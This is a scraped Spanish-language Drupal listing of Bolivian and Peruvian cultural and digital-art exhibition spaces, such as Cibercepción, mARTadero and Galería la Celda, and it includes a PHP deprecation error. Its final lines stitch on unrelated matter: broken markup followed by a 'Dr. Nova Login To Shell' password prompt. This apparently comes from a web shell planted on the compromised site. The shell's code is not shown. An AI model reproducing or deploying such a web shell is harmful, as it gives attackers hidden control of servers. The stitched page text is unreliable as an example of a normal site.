espacios de exhibición

Error message

Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in menu_set_active_trail() (line 2292 of /var/www/insularesdivergentes.org/includes/menu.inc).

Festival Cibercepción

País: 

Cibercepción es un festival de  video arte que organiza anualmente Samantha Bryce en Sucre (Bolivia), desde la asociación “Imaginea-Arte y Cultura”  con el apoyo de Hyvos y varias instituciones locales.

Dialectos Digitales

País: 

“Dialectos Digitales” es el festival de Cultura Digital que organizó Oficialía de Culturas de la Alcaldía de La Paz en 2009. Esta experiencia sucede a dos festivales previos (2008 y 2007) de creación digital organizados por la misma institución y coordinados por Daniel Rico.

Lucha Libre Boliviana

País: 

En el Alto, arriba de la ciudad de la Paz, hay una tradición muy grande de lucha libre.  En esta práctica lo más saltante es que hay mucha participación de mujeres , conocidas como las "cholitas luchadoras".

Martadero

País: 

mARTadero es un proyecto de resignificación de un antiguo matadero en un barrio marginado en la ciudad de Cochabamba (Bolivia).

Asimetría

País: 

Asimetría nace en el año 2006 con el objetivo de establecer una plataforma abierta para investigar, difundir y crear un debate en torno a medios alternativos de comunicación basados en nuevas tecnologías.

Culturaperú

País: 

En 2005, Realidad Visual, una asociación civil dedicada a la cultura y la tecnología desde el 2001, se propone crear “Culturaperu.org”: una plataforma web para integrar a una potencial comunidad, compuesta por las asociaciones civiles que apuestan por el sector cultural como un factor para el des

Troonic

País: 

Egidio Auccahuaque es un educador y físico que trabajó durante 12 años como jefe de prácticas e un laboratorio en la especialidad de Ingeniería Electrónica de la PUCP (Pontificia Universidad Católica del Perú).

El Caminerito

País: 

El Caminerito es un magazine en internet sobre cultura y sociedad que alberga también discusiones sobre las actividades y la gestión cultural en la ciudad del Cuzco, inicialmente. El magazine funciona como un canal articulador de información para una comunidad de consumidores de cultura local.

Estamos en la Calle

País: 

El Proyecto de impacto cultural “Estamos en la Calle” surge de la idea de los mismos jóvenes artistas en su necesidad de recuperar el nuevo arte urbano en la ciudad de Iquitos, por lo que se decide tomar por asalto la calle.

Galería la Celda

País: 

Raúl Chuquimia y Nereyda Apaza impulsan desde 2009 una galería de Arte en espacio virtual (web) llamada "La Celda".

Páginas

Subscribe to RSS - espacios de exhibición
<xmp><body></xmp><xmp></body></html></xmp>Dr. Nova Login To Shell

Dr. Nova ShellCode
| Please Password |